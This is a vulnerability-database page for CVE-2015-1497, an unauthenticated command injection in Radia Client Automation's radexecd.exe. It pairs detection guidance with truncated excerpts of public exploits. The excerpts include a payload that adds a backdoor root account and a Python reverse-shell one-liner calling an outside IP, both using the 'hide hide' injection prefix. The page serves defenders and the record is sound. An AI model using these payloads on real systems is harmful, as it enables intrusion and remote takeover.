CVE-2015-1497
published 2015-02-16CVE-2015-1497: radexecd.exe in Persistent Systems Radia Client Automation (RCA) 7.9, 8.1, 9.0, and 9.1 allows remote attackers to execute arbitrary commands via a crafted…
PriorityP183critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
75.12%
99.4th percentile
radexecd.exe in Persistent Systems Radia Client Automation (RCA) 7.9, 8.1, 9.0, and 9.1 allows remote attackers to execute arbitrary commands via a crafted request to TCP port 3465.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| persistent_systems | radia_client_automation | — | — |
| persistent_systems | radia_client_automation | — | — |
| persistent_systems | radia_client_automation | — | — |
| persistent_systems | radia_client_automation | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Detect unauthenticated TCP connections to port 3465 followed by a null-byte-delimited request containing the token 'hide hide' — this is the command injection trigger pattern used by all known exploits for CVE-2015-1497. ↗
- →Alert on any TCP stream to port 3465 where the payload contains the byte sequence 0x68 0x69 0x64 0x65 0x20 0x68 0x69 0x64 0x65 ('hide hide') followed by a tab character (0x09), indicating command injection. ↗
- →On Windows targets, monitor for radexecd.exe spawning cmd.exe with net user, net localgroup, netsh firewall, or reg add commands — these are the post-exploitation commands injected via the vulnerability. ↗
- →On Linux targets, monitor for radexecd spawning sh -c with useradd or python reverse-shell one-liners as child processes. ↗
- →The Metasploit module uses a VBS cmdstager (flavor: vbs, linemax: 290) on Windows targets; detect creation of .vbs stager files in temp directories by processes descended from radexecd.exe. ↗
- →The exploit-db module (36206) drops a file named installservice.exe on an attacker-controlled SMB share and instructs the vulnerable host to fetch and execute it; monitor for radexecd.exe making outbound SMB (port 445) connections. ↗
- ·The vulnerability exists because radexecd.exe does not authenticate execution requests by default; enabling authentication (RBAC/Remote Notify security controls) mitigates the issue without patching. ↗
- ·The vendor advisory URL referenced in the Metasploit module points to Accelerite's guidance on enabling RBAC and Remote Notify security features as the recommended hardening measure. ↗
- ·All four product versions (7.9, 8.1, 9.0, 9.1) are affected across both Windows and Linux platforms, so detection rules should not be scoped to a single OS or version. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
HP Client 9.1/9.0/8.1/7.9 - Command Injection
exploitdb·2016-10-10·CVSS 10.0
CVE-2015-1497 [CRITICAL] HP Client 9.1/9.0/8.1/7.9 - Command Injection
HP Client 9.1/9.0/8.1/7.9 - Command Injection
---
# Exploit Title: [HP Client - Automation Command Injection]
# Date: [10/10/2016]
# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot
# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]
# Version: [Tested on version 7.9 but should work on 8.1, 9.0, 9.1 too]
# Tested on: [Windows 7 and CentOS release 6.7 (Final)]
# CVE : [CVE-2015-1497]
#Can run following commands on linux target
#Useradd Payload: hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE -g root'
#Reverse Shell Payload: hide hide sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\
Exploit-DB
Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)
exploitdb·2015-02-27·CVSS 10.0
CVE-2015-1497 [CRITICAL] Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)
Persistent Systems Client Automation - Command Injection Remote Code Execution (Metasploit)
---
# Exploit Title: Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability
# Date: 2014-10-01
# Exploit Author: Ben Turner
# Vendor Homepage: Previosuly HP, now http://www.persistentsys.com/
# Version: 7.9, 8.1, 9.0, 9.1
# Tested on: Windows XP, Windows 7, Server 2003 and Server 2008
# CVE-2015-1497
# CVSS: 10
require 'msf/core'
class Metasploit3 'Persistent Systems Client Automation (PSCA, formerly HPCA or Radia) Command Injection Remote Code Execution Vulnerability',
'Description' => %Q{
This module exploits PS Client Automation, by sending a remote service install and creating a callback payload.
},
'Author' => [ 'Ben Turner'
Exploit-DB
HP Client - Automation Command Injection (Metasploit)
exploitdb·2015-02-24
CVE-2015-1497 HP Client - Automation Command Injection (Metasploit)
HP Client - Automation Command Injection (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 'HP Client Automation Command Injection',
'Description' => %q{
This module exploits a command injection vulnerability on HP Client Automation, distributed
actually as Persistent Systems Client Automation. The vulnerability exists in the Notify
Daemon (radexecd.exe), which doesn't authenticate execution requests by default neither.
This module has been tested successfully on HP Client Automation 9.00 over Windows 2003 SP2
and CentOS 5.
},
'Author' =>
[
'Ben Turner', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
['CVE', '201
Metasploit
HP Client Automation Command Injection
metasploit
HP Client Automation Command Injection
HP Client Automation Command Injection
This module exploits a command injection vulnerability on HP Client Automation, distributed actually as Persistent Systems Client Automation. The vulnerability exists in the Notify Daemon (radexecd.exe), which doesn't authenticate execution requests by default. This module has been tested successfully on HP Client Automation 9.00 on Windows 2003 SP2 and CentOS 5.
No writeups or analysis indexed.
http://osvdb.org/show/osvdb/118382http://packetstormsecurity.com/files/130459/HP-Client-Automation-Command-Injection.htmlhttp://www.exploit-db.com/exploits/36169http://www.exploit-db.com/exploits/36206http://www.securityfocus.com/bid/72612http://www.zerodayinitiative.com/advisories/ZDI-15-038/https://support.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-featureshttps://www.exploit-db.com/exploits/40491/http://osvdb.org/show/osvdb/118382http://packetstormsecurity.com/files/130459/HP-Client-Automation-Command-Injection.htmlhttp://www.exploit-db.com/exploits/36169http://www.exploit-db.com/exploits/36206http://www.securityfocus.com/bid/72612http://www.zerodayinitiative.com/advisories/ZDI-15-038/https://support.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-featureshttps://www.exploit-db.com/exploits/40491/
2015-02-16
Published